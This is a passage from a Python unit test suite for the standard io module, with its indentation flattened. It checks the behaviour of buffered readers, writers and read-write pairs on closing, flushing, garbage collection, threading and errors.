# This exercises the availability of attributes on object
# destruction.
# (in the C version, close() is called by the tp_dealloc
# function, not by __del__)
self.on_del = 1
self.on_close = 2
self.on_flush = 3
def __del__(self):
record.append(self.on_del)
try:
f = super(MyIO, self).__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(self.on_close)
super(MyIO, self).close()
def flush(self):
record.append(self.on_flush)
super(MyIO, self).flush()
f = MyIO()
del f
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
def test_IOBase_destructor(self):
self._check_base_destructor(self.IOBase)
def test_RawIOBase_destructor(self):
self._check_base_destructor(self.RawIOBase)
def test_BufferedIOBase_destructor(self):
self._check_base_destructor(self.BufferedIOBase)
def test_TextIOBase_destructor(self):
self._check_base_destructor(self.TextIOBase)
def test_close_flushes(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"xxx")
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"xxx")
def test_array_writes(self):
a = array.array(b'i', range(10))
n = len(a.tostring())
with self.open(support.TESTFN, "wb", 0) as f:
self.assertEqual(f.write(a), n)
with self.open(support.TESTFN, "wb") as f:
self.assertEqual(f.write(a), n)
def test_closefd(self):
self.assertRaises(ValueError, self.open, support.TESTFN, 'w',
closefd=False)
def test_read_closed(self):
with self.open(support.TESTFN, "w") as f:
f.write("egg\n")
with self.open(support.TESTFN, "r") as f:
file = self.open(f.fileno(), "r", closefd=False)
self.assertEqual(file.read(), "egg\n")
file.seek(0)
file.close()
self.assertRaises(ValueError, file.read)
def test_no_closefd_with_filename(self):
# can't use closefd in combination with a file name
self.assertRaises(ValueError, self.open, support.TESTFN, "r", closefd=False)
def test_closefd_attr(self):
with self.open(support.TESTFN, "wb") as f:
f.write(b"egg\n")
with self.open(support.TESTFN, "r") as f:
self.assertEqual(f.buffer.raw.closefd, True)
file = self.open(f.fileno(), "r", closefd=False)
self.assertEqual(file.buffer.raw.closefd, False)
def test_garbage_collection(self):
# FileIO objects are collected, and collecting them flushes
# all data to disk.
f = self.FileIO(support.TESTFN, "wb")
f.write(b"abcxxx")
f.f = f
wr = weakref.ref(f)
del f
support.gc_collect()
self.assertIsNone(wr(), wr)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"abcxxx")
def test_unbounded_file(self):
# Issue #1174606: reading from an unbounded stream such as /dev/zero.
zero = "/dev/zero"
if not os.path.exists(zero):
self.skipTest("{0} does not exist".format(zero))
if sys.maxsize > 0x7FFFFFFF:
self.skipTest("test can only run in a 32-bit address space")
if support.real_max_memuse < support._2G:
self.skipTest("test requires at least 2GB of memory")
with self.open(zero, "rb", buffering=0) as f:
self.assertRaises(OverflowError, f.read)
with self.open(zero, "rb") as f:
self.assertRaises(OverflowError, f.read)
with self.open(zero, "r") as f:
self.assertRaises(OverflowError, f.read)
def check_flush_error_on_close(self, *args, **kwargs):
# Test that the file is closed despite failed flush
# and that flush() is called before file closed.
f = self.open(*args, **kwargs)
closed = []
def bad_flush():
closed[:] = [f.closed]
raise IOError()
f.flush = bad_flush
self.assertRaises(IOError, f.close) # exception not swallowed
self.assertTrue(f.closed)
self.assertTrue(closed) # flush() called
self.assertFalse(closed[0]) # flush() called before file closed
f.flush = lambda: None # break reference loop
def test_flush_error_on_close(self):
# raw file
# Issue #5700: io.FileIO calls flush() after file closed
self.check_flush_error_on_close(support.TESTFN, 'wb', buffering=0)
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb', buffering=0)
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb', buffering=0, closefd=False)
os.close(fd)
# buffered io
self.check_flush_error_on_close(support.TESTFN, 'wb')
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb')
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb', closefd=False)
os.close(fd)
# text io
self.check_flush_error_on_close(support.TESTFN, 'w')
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'w')
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'w', closefd=False)
os.close(fd)
def test_multi_close(self):
f = self.open(support.TESTFN, "wb", buffering=0)
f.close()
f.close()
f.close()
self.assertRaises(ValueError, f.flush)
def test_RawIOBase_read(self):
# Exercise the default RawIOBase.read() implementation (which calls
# readinto() internally).
rawio = self.MockRawIOWithoutRead((b"abc", b"d", None, b"efg", None))
self.assertEqual(rawio.read(2), b"ab")
self.assertEqual(rawio.read(2), b"c")
self.assertEqual(rawio.read(2), b"d")
self.assertEqual(rawio.read(2), None)
self.assertEqual(rawio.read(2), b"ef")
self.assertEqual(rawio.read(2), b"g")
self.assertEqual(rawio.read(2), None)
self.assertEqual(rawio.read(2), b"")
def test_fileio_closefd(self):
# Issue #4841
with self.open(__file__, 'rb') as f1, \
self.open(__file__, 'rb') as f2:
fileio = self.FileIO(f1.fileno(), closefd=False)
# .__init__() must not close f1
fileio.__init__(f2.fileno(), closefd=False)
f1.readline()
# .close() must not close f2
fileio.close()
f2.readline()
def test_nonbuffered_textio(self):
with warnings.catch_warnings(record=True) as recorded:
with self.assertRaises(ValueError):
self.open(support.TESTFN, 'w', buffering=0)
support.gc_collect()
self.assertEqual(recorded, [])
def test_invalid_newline(self):
with warnings.catch_warnings(record=True) as recorded:
with self.assertRaises(ValueError):
self.open(support.TESTFN, 'w', newline='invalid')
support.gc_collect()
self.assertEqual(recorded, [])
class CIOTest(IOTest):
def test_IOBase_finalize(self):
# Issue #12149: segmentation fault on _PyIOBase_finalize when both a
# class which inherits IOBase and an object of this class are caught
# in a reference cycle and close() is already in the method cache.
class MyIO(self.IOBase):
def close(self):
pass
# create an instance to populate the method cache
MyIO()
obj = MyIO()
obj.obj = obj
wr = weakref.ref(obj)
del MyIO
del obj
support.gc_collect()
self.assertIsNone(wr(), wr)
class PyIOTest(IOTest):
test_array_writes = unittest.skip(
"len(array.array) returns number of elements rather than bytelength"
)(IOTest.test_array_writes)
class CommonBufferedTests:
# Tests common to BufferedReader, BufferedWriter and BufferedRandom
def test_detach(self):
raw = self.MockRawIO()
buf = self.tp(raw)
self.assertIs(buf.detach(), raw)
self.assertRaises(ValueError, buf.detach)
repr(buf) # Should still work
def test_fileno(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertEqual(42, bufio.fileno())
@unittest.skip('test having existential crisis')
def test_no_fileno(self):
# XXX will we always have fileno() function? If so, kill
# this test. Else, write it.
pass
def test_invalid_args(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
# Invalid whence
self.assertRaises(ValueError, bufio.seek, 0, -1)
self.assertRaises(ValueError, bufio.seek, 0, 3)
def test_override_destructor(self):
tp = self.tp
record = []
class MyBufferedIO(tp):
def __del__(self):
record.append(1)
try:
f = super(MyBufferedIO, self).__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(2)
super(MyBufferedIO, self).close()
def flush(self):
record.append(3)
super(MyBufferedIO, self).flush()
rawio = self.MockRawIO()
bufio = MyBufferedIO(rawio)
writable = bufio.writable()
del bufio
support.gc_collect()
if writable:
self.assertEqual(record, [1, 2, 3])
else:
self.assertEqual(record, [1, 2])
def test_context_manager(self):
# Test usability as a context manager
rawio = self.MockRawIO()
bufio = self.tp(rawio)
def _with():
with bufio:
pass
_with()
# bufio should now be closed, and using it a second time should raise
# a ValueError.
self.assertRaises(ValueError, _with)
def test_error_through_destructor(self):
# Test that the exception state is not modified by a destructor,
# even if close() fails.
rawio = self.CloseFailureIO()
def f():
self.tp(rawio).xyzzy
with support.captured_output("stderr") as s:
self.assertRaises(AttributeError, f)
s = s.getvalue().strip()
if s:
# The destructor *may* have printed an unraisable error, check it
self.assertEqual(len(s.splitlines()), 1)
self.assertTrue(s.startswith("Exception IOError: "), s)
self.assertTrue(s.endswith(" ignored"), s)
def test_repr(self):
raw = self.MockRawIO()
b = self.tp(raw)
clsname = "%s.%s" % (self.tp.__module__, self.tp.__name__)
self.assertEqual(repr(b), "<%s>" % clsname)
raw.name = "dummy"
self.assertEqual(repr(b), "<%s name=u'dummy'>" % clsname)
raw.name = b"dummy"
self.assertEqual(repr(b), "<%s name='dummy'>" % clsname)
def test_flush_error_on_close(self):
# Test that buffered file is closed despite failed flush
# and that flush() is called before file closed.
raw = self.MockRawIO()
closed = []
def bad_flush():
closed[:] = [b.closed, raw.closed]
raise IOError()
raw.flush = bad_flush
b = self.tp(raw)
self.assertRaises(IOError, b.close) # exception not swallowed
self.assertTrue(b.closed)
self.assertTrue(raw.closed)
self.assertTrue(closed) # flush() called
self.assertFalse(closed[0]) # flush() called before file closed
self.assertFalse(closed[1])
raw.flush = lambda: None # break reference loop
def test_close_error_on_close(self):
raw = self.MockRawIO()
def bad_flush():
raise IOError('flush')
def bad_close():
raise IOError('close')
raw.close = bad_close
b = self.tp(raw)
b.flush = bad_flush
with self.assertRaises(IOError) as err: # exception not swallowed
b.close()
self.assertEqual(err.exception.args, ('close',))
self.assertFalse(b.closed)
def test_multi_close(self):
raw = self.MockRawIO()
b = self.tp(raw)
b.close()
b.close()
b.close()
self.assertRaises(ValueError, b.flush)
def test_readonly_attributes(self):
raw = self.MockRawIO()
buf = self.tp(raw)
x = self.MockRawIO()
with self.assertRaises((AttributeError, TypeError)):
buf.raw = x
class SizeofTest:
@support.cpython_only
def test_sizeof(self):
bufsize1 = 4096
bufsize2 = 8192
rawio = self.MockRawIO()
bufio = self.tp(rawio, buffer_size=bufsize1)
size = sys.getsizeof(bufio) - bufsize1
rawio = self.MockRawIO()
bufio = self.tp(rawio, buffer_size=bufsize2)
self.assertEqual(sys.getsizeof(bufio), size + bufsize2)
class BufferedReaderTest(unittest.TestCase, CommonBufferedTests):
read_mode = "rb"
def test_constructor(self):
rawio = self.MockRawIO([b"abc"])
bufio = self.tp(rawio)
bufio.__init__(rawio)
bufio.__init__(rawio, buffer_size=1024)
bufio.__init__(rawio, buffer_size=16)
self.assertEqual(b"abc", bufio.read())
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
rawio = self.MockRawIO([b"abc"])
bufio.__init__(rawio)
self.assertEqual(b"abc", bufio.read())
def test_uninitialized(self):
bufio = self.tp.__new__(self.tp)
del bufio
bufio = self.tp.__new__(self.tp)
self.assertRaisesRegexp((ValueError, AttributeError),
'uninitialized|has no attribute',
bufio.read, 0)
bufio.__init__(self.MockRawIO())
self.assertEqual(bufio.read(0), b'')
def test_read(self):
for arg in (None, 7):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"abcdefg", bufio.read(arg))
# Invalid args
self.assertRaises(ValueError, bufio.read, -2)
def test_read1(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"a", bufio.read(1))
self.assertEqual(b"b", bufio.read1(1))
self.assertEqual(rawio._reads, 1)
self.assertEqual(b"c", bufio.read1(100))
self.assertEqual(rawio._reads, 1)
self.assertEqual(b"d", bufio.read1(100))
self.assertEqual(rawio._reads, 2)
self.assertEqual(b"efg", bufio.read1(100))
self.assertEqual(rawio._reads, 3)
self.assertEqual(b"", bufio.read1(100))
self.assertEqual(rawio._reads, 4)
# Invalid args
self.assertRaises(ValueError, bufio.read1, -1)
def test_readinto(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
b = bytearray(2)
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"ab")
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"cd")
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"ef")
self.assertEqual(bufio.readinto(b), 1)
self.assertEqual(b, b"gf")
self.assertEqual(bufio.readinto(b), 0)
self.assertEqual(b, b"gf")
def test_readlines(self):
def bufio():
rawio = self.MockRawIO((b"abc\n", b"d\n", b"ef"))
return self.tp(rawio)
self.assertEqual(bufio().readlines(), [b"abc\n", b"d\n", b"ef"])
self.assertEqual(bufio().readlines(5), [b"abc\n", b"d\n"])
self.assertEqual(bufio().readlines(None), [b"abc\n", b"d\n", b"ef"])
def test_buffering(self):
data = b"abcdefghi"
dlen = len(data)
tests = [
[ 100, [ 3, 1, 4, 8 ], [ dlen, 0 ] ],
[ 100, [ 3, 3, 3], [ dlen ] ],
[ 4, [ 1, 2, 4, 2 ], [ 4, 4, 1 ] ],
]
for bufsize, buf_read_sizes, raw_read_sizes in tests:
rawio = self.MockFileIO(data)
bufio = self.tp(rawio, buffer_size=bufsize)
pos = 0
for nbytes in buf_read_sizes:
self.assertEqual(bufio.read(nbytes), data[pos:pos+nbytes])
pos += nbytes
# this is mildly implementation-dependent
self.assertEqual(rawio.read_history, raw_read_sizes)
def test_read_non_blocking(self):
# Inject some None's in there to simulate EWOULDBLOCK
rawio = self.MockRawIO((b"abc", b"d", None, b"efg", None, None, None))
bufio = self.tp(rawio)
self.assertEqual(b"abcd", bufio.read(6))
self.assertEqual(b"e", bufio.read(1))
self.assertEqual(b"fg", bufio.read())
self.assertEqual(b"", bufio.peek(1))
self.assertIsNone(bufio.read())
self.assertEqual(b"", bufio.read())
rawio = self.MockRawIO((b"a", None, None))
self.assertEqual(b"a", rawio.readall())
self.assertIsNone(rawio.readall())
def test_read_past_eof(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"abcdefg", bufio.read(9000))
def test_read_all(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"abcdefg", bufio.read())
@unittest.skipUnless(threading, 'Threading required for this test.')
@support.requires_resource('cpu')
def test_threads(self):
try:
# Write out many bytes with exactly the same number of 0's,
# 1's... 255's. This will help us check that concurrent reading
# doesn't duplicate or forget contents.
N = 1000
l = list(range(256)) * N
random.shuffle(l)
s = bytes(bytearray(l))
with self.open(support.TESTFN, "wb") as f:
f.write(s)
with self.open(support.TESTFN, self.read_mode, buffering=0) as raw:
bufio = self.tp(raw, 8)
errors = []
results = []
def f():
try:
# Intra-buffer read then buffer-flushing read
for n in cycle([1, 19]):
s = bufio.read(n)
if not s:
break
# list.append() is atomic
results.append(s)
except Exception as e:
errors.append(e)
raise
threads = [threading.Thread(target=f) for x in range(20)]
with support.start_threads(threads):
time.sleep(0.02) # yield
self.assertFalse(errors,
"the following exceptions were caught: %r" % errors)
s = b''.join(results)
for i in range(256):
c = bytes(bytearray([i]))
self.assertEqual(s.count(c), N)
finally:
support.unlink(support.TESTFN)
def test_misbehaved_io(self):
rawio = self.MisbehavedRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertRaises(IOError, bufio.seek, 0)
self.assertRaises(IOError, bufio.tell)
def test_no_extraneous_read(self):
# Issue #9550; when the raw IO object has satisfied the read request,
# we should not issue any additional reads, otherwise it may block
# (e.g. socket).
bufsize = 16
for n in (2, bufsize - 1, bufsize, bufsize + 1, bufsize * 2):
rawio = self.MockRawIO([b"x" * n])
bufio = self.tp(rawio, bufsize)
self.assertEqual(bufio.read(n), b"x" * n)
# Simple case: one raw read is enough to satisfy the request.
self.assertEqual(rawio._extraneous_reads, 0,
"failed for {}: {} != 0".format(n, rawio._extraneous_reads))
# A more complex case where two raw reads are needed to satisfy
# the request.
rawio = self.MockRawIO([b"x" * (n - 1), b"x"])
bufio = self.tp(rawio, bufsize)
self.assertEqual(bufio.read(n), b"x" * n)
self.assertEqual(rawio._extraneous_reads, 0,
"failed for {}: {} != 0".format(n, rawio._extraneous_reads))
class CBufferedReaderTest(BufferedReaderTest, SizeofTest):
tp = io.BufferedReader
def test_constructor(self):
BufferedReaderTest.test_constructor(self)
# The allocation can succeed on 32-bit builds, e.g. with more
# than 2GB RAM and a 64-bit kernel.
if sys.maxsize > 0x7FFFFFFF:
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises((OverflowError, MemoryError, ValueError),
bufio.__init__, rawio, sys.maxsize)
def test_initialization(self):
rawio = self.MockRawIO([b"abc"])
bufio = self.tp(rawio)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.read)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.read)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
self.assertRaises(ValueError, bufio.read)
def test_misbehaved_io_read(self):
rawio = self.MisbehavedRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
# _pyio.BufferedReader seems to implement reading different, so that
# checking this is not so easy.
self.assertRaises(IOError, bufio.read, 10)
def test_garbage_collection(self):
# C BufferedReader objects are collected.
# The Python version has __del__, so it ends into gc.garbage instead
rawio = self.FileIO(support.TESTFN, "w+b")
f = self.tp(rawio)
f.f = f
wr = weakref.ref(f)
del f
support.gc_collect()
self.assertIsNone(wr(), wr)
def test_args_error(self):
# Issue #17275
with self.assertRaisesRegexp(TypeError, "BufferedReader"):
self.tp(io.BytesIO(), 1024, 1024, 1024)
class PyBufferedReaderTest(BufferedReaderTest):
tp = pyio.BufferedReader
class BufferedWriterTest(unittest.TestCase, CommonBufferedTests):
write_mode = "wb"
def test_constructor(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
bufio.__init__(rawio)
bufio.__init__(rawio, buffer_size=1024)
bufio.__init__(rawio, buffer_size=16)
self.assertEqual(3, bufio.write(b"abc"))
bufio.flush()
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
bufio.__init__(rawio)
self.assertEqual(3, bufio.write(b"ghi"))
bufio.flush()
self.assertEqual(b"".join(rawio._write_stack), b"abcghi")
def test_uninitialized(self):
bufio = self.tp.__new__(self.tp)
del bufio
bufio = self.tp.__new__(self.tp)
self.assertRaisesRegexp((ValueError, AttributeError),
'uninitialized|has no attribute',
bufio.write, b'')
bufio.__init__(self.MockRawIO())
self.assertEqual(bufio.write(b''), 0)
def test_detach_flush(self):
raw = self.MockRawIO()
buf = self.tp(raw)
buf.write(b"howdy!")
self.assertFalse(raw._write_stack)
buf.detach()
self.assertEqual(raw._write_stack, [b"howdy!"])
def test_write(self):
# Write to the buffered IO but don't overflow the buffer.
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.write(b"abc")
self.assertFalse(writer._write_stack)
def test_write_overflow(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
contents = b"abcdefghijklmnop"
for n in range(0, len(contents), 3):
bufio.write(contents[n:n+3])
flushed = b"".join(writer._write_stack)
# At least (total - 8) bytes were implicitly flushed, perhaps more
# depending on the implementation.
self.assertTrue(flushed.startswith(contents[:-8]), flushed)
def check_writes(self, intermediate_func):
# Lots of writes, test the flushed output is as expected.
contents = bytes(range(256)) * 1000
n = 0
writer = self.MockRawIO()
bufio = self.tp(writer, 13)
# Generator of write sizes: repeat each N 15 times then proceed to N+1
def gen_sizes():
for size in count(1):
for i in range(15):
yield size
sizes = gen_sizes()
while n < len(contents):
size = min(next(sizes), len(contents) - n)
self.assertEqual(bufio.write(contents[n:n+size]), size)
intermediate_func(bufio)
n += size
bufio.flush()
self.assertEqual(contents,
b"".join(writer._write_stack))
def test_writes(self):
self.check_writes(lambda bufio: None)
def test_writes_and_flushes(self):
self.check_writes(lambda bufio: bufio.flush())
def test_writes_and_seeks(self):
def _seekabs(bufio):
pos = bufio.tell()
bufio.seek(pos + 1, 0)
bufio.seek(pos - 1, 0)
bufio.seek(pos, 0)
self.check_writes(_seekabs)
def _seekrel(bufio):
pos = bufio.seek(0, 1)
bufio.seek(+1, 1)
bufio.seek(-1, 1)
bufio.seek(pos, 0)
self.check_writes(_seekrel)
def test_writes_and_truncates(self):
self.check_writes(lambda bufio: bufio.truncate(bufio.tell()))
def test_write_non_blocking(self):
raw = self.MockNonBlockWriterIO()
bufio = self.tp(raw, 8)
self.assertEqual(bufio.write(b"abcd"), 4)
self.assertEqual(bufio.write(b"efghi"), 5)
# 1 byte will be written, the rest will be buffered
raw.block_on(b"k")
self.assertEqual(bufio.write(b"jklmn"), 5)
# 8 bytes will be written, 8 will be buffered and the rest will be lost
raw.block_on(b"0")
try:
bufio.write(b"opqrwxyz0123456789")
except self.BlockingIOError as e:
written = e.characters_written
else:
self.fail("BlockingIOError should have been raised")
self.assertEqual(written, 16)
self.assertEqual(raw.pop_written(),
b"abcdefghijklmnopqrwxyz")
self.assertEqual(bufio.write(b"ABCDEFGHI"), 9)
s = raw.pop_written()
# Previously buffered bytes were flushed
self.assertTrue(s.startswith(b"01234567A"), s)
def test_write_and_rewind(self):
raw = io.BytesIO()
bufio = self.tp(raw, 4)
self.assertEqual(bufio.write(b"abcdef"), 6)
self.assertEqual(bufio.tell(), 6)
bufio.seek(0, 0)
self.assertEqual(bufio.write(b"XY"), 2)
bufio.seek(6, 0)
self.assertEqual(raw.getvalue(), b"XYcdef")
self.assertEqual(bufio.write(b"123456"), 6)
bufio.flush()
self.assertEqual(raw.getvalue(), b"XYcdef123456")
def test_flush(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.write(b"abc")
bufio.flush()
self.assertEqual(b"abc", writer._write_stack[0])
def test_writelines(self):
l = [b'ab', b'cd', b'ef']
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.writelines(l)
bufio.flush()
self.assertEqual(b''.join(writer._write_stack), b'abcdef')
def test_writelines_userlist(self):
l = UserList([b'ab', b'cd', b'ef'])
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.writelines(l)
bufio.flush()
self.assertEqual(b''.join(writer._write_stack), b'abcdef')
def test_writelines_error(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
self.assertRaises(TypeError, bufio.writelines, [1, 2, 3])
self.assertRaises(TypeError, bufio.writelines, None)
def test_destructor(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.write(b"abc")
del bufio
support.gc_collect()
self.assertEqual(b"abc", writer._write_stack[0])
def test_truncate(self):
# Truncate implicitly flushes the buffer.
with self.open(support.TESTFN, self.write_mode, buffering=0) as raw:
bufio = self.tp(raw, 8)
bufio.write(b"abcdef")
self.assertEqual(bufio.truncate(3), 3)
self.assertEqual(bufio.tell(), 6)
with self.open(support.TESTFN, "rb", buffering=0) as f:
self.assertEqual(f.read(), b"abc")
@unittest.skipUnless(threading, 'Threading required for this test.')
@support.requires_resource('cpu')
def test_threads(self):
try:
# Write out many bytes from many threads and test they were
# all flushed.
N = 1000
contents = bytes(range(256)) * N
sizes = cycle([1, 19])
n = 0
queue = deque()
while n < len(contents):
size = next(sizes)
queue.append(contents[n:n+size])
n += size
del contents
# We use a real file object because it allows us to
# exercise situations where the GIL is released before
# writing the buffer to the raw streams. This is in addition
# to concurrency issues due to switching threads in the middle
# of Python code.
with self.open(support.TESTFN, self.write_mode, buffering=0) as raw:
bufio = self.tp(raw, 8)
errors = []
def f():
try:
while True:
try:
s = queue.popleft()
except IndexError:
return
bufio.write(s)
except Exception as e:
errors.append(e)
raise
threads = [threading.Thread(target=f) for x in range(20)]
with support.start_threads(threads):
time.sleep(0.02) # yield
self.assertFalse(errors,
"the following exceptions were caught: %r" % errors)
bufio.close()
with self.open(support.TESTFN, "rb") as f:
s = f.read()
for i in range(256):
self.assertEqual(s.count(bytes([i])), N)
finally:
support.unlink(support.TESTFN)
def test_misbehaved_io(self):
rawio = self.MisbehavedRawIO()
bufio = self.tp(rawio, 5)
self.assertRaises(IOError, bufio.seek, 0)
self.assertRaises(IOError, bufio.tell)
self.assertRaises(IOError, bufio.write, b"abcdef")
def test_max_buffer_size_deprecation(self):
with support.check_warnings(("max_buffer_size is deprecated",
DeprecationWarning)):
self.tp(self.MockRawIO(), 8, 12)
def test_write_error_on_close(self):
raw = self.MockRawIO()
def bad_write(b):
raise IOError()
raw.write = bad_write
b = self.tp(raw)
b.write(b'spam')
self.assertRaises(IOError, b.close) # exception not swallowed
self.assertTrue(b.closed)
class CBufferedWriterTest(BufferedWriterTest, SizeofTest):
tp = io.BufferedWriter
def test_constructor(self):
BufferedWriterTest.test_constructor(self)
# The allocation can succeed on 32-bit builds, e.g. with more
# than 2GB RAM and a 64-bit kernel.
if sys.maxsize > 0x7FFFFFFF:
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises((OverflowError, MemoryError, ValueError),
bufio.__init__, rawio, sys.maxsize)
def test_initialization(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.write, b"def")
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.write, b"def")
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
self.assertRaises(ValueError, bufio.write, b"def")
def test_garbage_collection(self):
# C BufferedWriter objects are collected, and collecting them flushes
# all data to disk.
# The Python version has __del__, so it ends into gc.garbage instead
rawio = self.FileIO(support.TESTFN, "w+b")
f = self.tp(rawio)
f.write(b"123xxx")
f.x = f
wr = weakref.ref(f)
del f
support.gc_collect()
self.assertIsNone(wr(), wr)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"123xxx")
def test_args_error(self):
# Issue #17275
with self.assertRaisesRegexp(TypeError, "BufferedWriter"):
self.tp(io.BytesIO(), 1024, 1024, 1024)
class PyBufferedWriterTest(BufferedWriterTest):
tp = pyio.BufferedWriter
class BufferedRWPairTest(unittest.TestCase):
def test_constructor(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertFalse(pair.closed)
def test_uninitialized(self):
pair = self.tp.__new__(self.tp)
del pair
pair = self.tp.__new__(self.tp)
self.assertRaisesRegexp((ValueError, AttributeError),
'uninitialized|has no attribute',
pair.read, 0)
self.assertRaisesRegexp((ValueError, AttributeError),
'uninitialized|has no attribute',
pair.write, b'')
pair.__init__(self.MockRawIO(), self.MockRawIO())
self.assertEqual(pair.read(0), b'')
self.assertEqual(pair.write(b''), 0)
def test_detach(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertRaises(self.UnsupportedOperation, pair.detach)
def test_constructor_max_buffer_size_deprecation(self):
with support.check_warnings(("max_buffer_size is deprecated",
DeprecationWarning)):
self.tp(self.MockRawIO(), self.MockRawIO(), 8, 12)
def test_constructor_with_not_readable(self):
class NotReadable(MockRawIO):
def readable(self):
return False
self.assertRaises(IOError, self.tp, NotReadable(), self.MockRawIO())
def test_constructor_with_not_writeable(self):
class NotWriteable(MockRawIO):
def writable(self):
return False
self.assertRaises(IOError, self.tp, self.MockRawIO(), NotWriteable())
def test_read(self):
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
self.assertEqual(pair.read(3), b"abc")
self.assertEqual(pair.read(1), b"d")
self.assertEqual(pair.read(), b"ef")
pair = self.tp(self.BytesIO(b"abc"), self.MockRawIO())
self.assertEqual(pair.read(None), b"abc")
def test_readlines(self):
pair = lambda: self.tp(self.BytesIO(b"abc\ndef\nh"), self.MockRawIO())
self.assertEqual(pair().readlines(), [b"abc\n", b"def\n", b"h"])
self.assertEqual(pair().readlines(), [b"abc\n", b"def\n", b"h"])
self.assertEqual(pair().readlines(5), [b"abc\n", b"def\n"])
def test_read1(self):
# .read1() is delegated to the underlying reader object, so this test
# can be shallow.
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
self.assertEqual(pair.read1(3), b"abc")
def test_readinto(self):
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
data = bytearray(5)
self.assertEqual(pair.readinto(data), 5)
self.assertEqual(data, b"abcde")
def test_write(self):
w = self.MockRawIO()
pair = self.tp(self.MockRawIO(), w)
pair.write(b"abc")
pair.flush()
pair.write(b"def")
pair.flush()
self.assertEqual(w._write_stack, [b"abc", b"def"])
def test_peek(self):
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
self.assertTrue(pair.peek(3).startswith(b"abc"))
self.assertEqual(pair.read(3), b"abc")
def test_readable(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertTrue(pair.readable())
def test_writeable(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertTrue(pair.writable())
def test_seekable(self):
# BufferedRWPairs are never seekable, even if their readers and writers
# are.
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertFalse(pair.seekable())
# .flush() is delegated to the underlying writer object and has been
# tested in the test_write method.
def test_close_and_closed(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertFalse(pair.closed)
pair.close()
self.assertTrue(pair.closed)
def test_reader_close_error_on_close(self):
def reader_close():
reader_non_existing
reader = self.MockRawIO()
reader.close = reader_close
writer = self.MockRawIO()
pair = self.tp(reader, writer)
with self.assertRaises(NameError) as err:
pair.close()
self.assertIn('reader_non_existing', str(err.exception))
self.assertTrue(pair.closed)
self.assertFalse(reader.closed)
self.assertTrue(writer.closed)
def test_writer_close_error_on_close(self):
def writer_close():
writer_non_existing
reader = self.MockRawIO()
writer = self.MockRawIO()
writer.close = writer_close
pair = self.tp(reader, writer)
with self.assertRaises(NameError) as err:
pair.close()
self.assertIn('writer_non_existing', str(err.exception))
self.assertFalse(pair.closed)
self.assertTrue(reader.closed)
self.assertFalse(writer.closed)
